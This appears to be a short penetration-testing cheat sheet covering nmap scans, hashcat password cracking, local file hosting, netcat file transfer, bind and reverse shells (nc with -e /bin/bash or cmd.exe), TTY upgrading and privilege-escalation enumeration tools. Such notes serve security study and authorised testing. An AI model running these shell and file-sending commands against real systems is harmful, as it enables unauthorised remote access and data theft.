Basic

Target Scan

Nmap

nmap -sC -sV -oA <location> <ip>
nmap -v -p- -A <ip>

Fuzz & Crack

Hashcat

hashcat -m <mode> <hash.txt> <wordlist.txt>

Create your own wordlist:

hashcat --force <passwords.txt> -r <best64.rule> --stdout

Find rules in /usr/share/hashcat/rules/

ffuf

Fuzz Faster U Fool. I guess that replaces Hydra and wfuzz.

Hosting

Host a file locally

python2 -m SimpleHTTPServer <port>
python3 -m http.server <port>

Shells

nc

TCP/IP Swiss army knife#

# Listen  
nc -nlvp <port>
nc -nlvp <port> > <incoming_file>   # redirect incoming input

# Connect
nc -nv <ip> <port>
nc -nv <ip> <port> < <push_file>    # send a file

Reverse Shells

Bob (Windows) dicrectly connected to Internet, Alice (Linux) behind NAT.

Bind Shell

# Bob can create a nc server and serve make clients connect to his shell
nc -nlvp <port> -e cmd.exe

# Alice can then connect to it

Reverse Shell

# Alice cannot bind port locally and expect Bob to connect (because NAT)
# Alice can instead send shell to Bob (Bob needs to setup nc server)

nc -nv <ip> <port> -e /bin/bash

More: Reverse Shell Cheatsheet

Getting a nicer prompt

python -c 'import pty; pty.spawn("/bin/bash")'
<C-z>
stty raw -echo
fg

script -c "/bin/bash -i" /dev/null

PrivEsc

Enumeration Scripts

LinPeas.sh / WinPeas.exe
Seatbelt (for Windows)

Monitoring

pspy - proccess snooping

PreviousRecon NextWindows

Last updated 4 years ago

Was this helpful?